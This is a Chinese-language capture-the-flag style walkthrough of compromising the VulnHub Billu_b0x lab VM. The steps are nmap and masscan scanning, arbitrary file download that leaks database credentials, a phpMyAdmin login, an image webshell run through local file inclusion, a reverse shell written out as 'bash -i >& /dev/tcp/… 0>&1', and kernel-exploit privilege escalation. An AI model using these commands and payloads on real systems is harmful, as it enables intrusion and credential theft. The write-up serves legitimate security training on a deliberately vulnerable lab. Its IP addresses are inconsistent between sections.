一、靶机下载

下载链接：https://download.vulnhub.com/billu/Billu_b0x.zip

二、Billu_b0x靶机搭建

将下载好的靶机环境，用VMware导入即可使用，文件->打开


导入到合适位置即可，默认是C盘，成功导入虚拟机之后，打开即可

三、攻击过程

kali IP：192.168.59.129
靶机IP：192.168.59.131

1、主机发现

nmap -sn 192.168.212.0/24

2、端口扫描

方法一：
nmap -sS 192.168.212.8

方法二：
masscan 192.168.212.8 -p 0-65535 --rate=10000

3、端口对应服务识别

nmap -sV -T4 -O 192.168.212.8 -p 22,80

4、漏洞利用与发现

访问WEB网站如下图
尝试80端口的访问,尝试弱口令以及爆破,万能密码注入,失败,暂时放弃

目录扫描

发现http://192.168.212.8/add ，尝试上传一个图片,可以看到没有提示成功没有提示失败,多次上传,猜测可能该页面是纯静态页面，用来迷惑攻击者

每个目录都查看一遍，发现phpinfo信息

发现http://192.168.212.8/test，提示“file”参数为空，请在“file”参数中提供文件路径

burpsuite抓包，GET方式传递参数，仍旧提示file参数为空

POST方式传递参数，会直接下载文件

为了方便查看内容，直接用burpsuite，发现可以看任何文件内容

既然可以任意文件下载，就把add.php、in.php、c.php、index.php、show.php、panel.php都查看一下，在c.php中发现连接数据库的密码

猜测是否有后台登陆界面，换个字典文件，继续扫描

发现可疑目录

访问发现是phpmyadmin

输入用户名密码登录"billu",“b0x_billu” 登录成功之后,发现账户密码，猜测是首页的

是首页登陆用户名密码biLLu/hEx_it，成功登录首页

发现该页面存在本地文件包含漏洞,可以利用前面test页面存在的任意文件下载漏洞(post形式的文件包含),下载该页面的代码,审计代码可以看到存在文件包含漏洞


上传一个php一句话图片马,然后利用文件包含
首先制作php一句话木马图片并上传



上传图片，上传后文件包含图片


接下来还是使用burp，在URL的post请求中加入POST /panel.php?x=cat%20/etc/passwd，正文中加入load=uploaded_images/11-sysmm.jpg&continue=continu

可以看到命令已经成功执行，接下来就是反弹shell
kali命令行里输入nc -lvnp 6666开始监听，同时burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.212.129/6666 0>&1” | bash，注意要将此命令先经过URL编码才能发送

kali监听

POST发送反弹shell命令

成功反弹会话

查看内核版本,然后再kali使用searchsploit查找是否有exp


将提权文件上传到WWW目录并开启WEB服务

下载到靶机

运行exp，成功提权

较好的参考

https://www.colabug.com/2018/1015/4905959/

总结:

1.信息收集
2.目录扫描,phpinfo信息泄露,注入，ssh用户和数据库用户一样存在风险
3.test页面存在post形式的文件包含(文件任意下载),panel.php页面存在文件包含漏洞
4.文件上传get shell
5.内核漏洞提权